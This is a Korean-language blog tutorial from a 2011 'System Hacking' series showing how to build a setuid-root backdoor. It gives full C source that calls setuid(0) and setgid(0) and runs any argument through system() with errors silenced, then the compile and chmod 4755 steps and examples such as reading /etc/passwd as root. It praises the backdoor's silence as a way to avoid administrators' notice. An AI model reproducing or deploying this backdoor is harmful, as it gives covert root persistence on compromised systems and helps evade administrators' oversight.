일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- 정보과학
- c언어
- if문
- 풀이&소스코드저작권:왕유승
- 리눅스
- DBMS
- 반복문
- For문
- 정보올림피아드
- C
- 정보영재원
- Backdoor
- 다중반복문
- 제어문
- 독서 감상문
- 영재교육원
- 독후감
- API
- IT
- 프로그래밍
- 배열
- 문제출저:www.dovelet.com
- 자료구조
- 백도어
- 리눅스 명령어
- 수학영재원
- 알고리즘
- 참조은요양병원
- C++
- Linux
Archives
- Today
- Total
되는대로 살자
[System Hacking] setuid를 이용한 백도어 만들기 - 세번째 방법 본문
먼저 #vi backexec.c를 입력하여 backexec.c라는 파일을 만들고 다음 코드를 입력합니다.
#include <stdio.h>
int main(int argc, char *argv[]){
char exec[100];
setuid(0);
setgid(0);
sprintf(exec,"%s 2>/dev/null", argv[1]);
system(exec);
}
그리고 마찬가지로 #gcc -o backexec backexec.c를 입력하여 컴파일 해줍니다.
#chmod 4755 backexec로 접근권한 및 setuid 설정을 바꿔줍니다.
이제 일반 사용자 모드로 접속하여 백도어를 실행하겠습니다. 이번 백도어는 앞의 두가지 방법들과는 달리 실행명령어 뒤에 큰따옴표를 붙여 그 안의 명령어를 실행하는 방식입니다. 이 방식은 단순히 실행하면 아무런 표시도 나지 않기 때문에 관리자에게 걸릴 확률이 비교적 적다고 할 수 있겠네요.
./backexec "id" 또는 ./backexec "tail /etc/passwd" 처럼 ""를 붙여 입력했을 때는 그 내용이 루트 권한으로 실행되는 것을 확인 하실 수 있습니다. 지금까지 소개한 세가지 백도어들은 미세하게는 차이가 있으나 큰 흐름은 같습니다. 마음에 드는 방법을 한가지 선택하셔서 연습하시면 되겠습니다.
다음 포스팅에서는 백도어를 찾는 방법과, 들키지 않게 숨기는 방법을 소개하겠습니다.
'2009~2014 > Hacking_System' 카테고리의 다른 글
[System Hacking] 백도어 찾기와 숨기기 (0) | 2011.07.21 |
---|---|
[System Hacking] Setuid를 이용한 백도어 만들기 - vi편집기 이용 (0) | 2011.07.21 |
[System Hacking] Setuid를 이용한 백도어 만들기 (1) (0) | 2011.07.21 |
[System Hacking] OS 해킹의 절차 (0) | 2011.07.21 |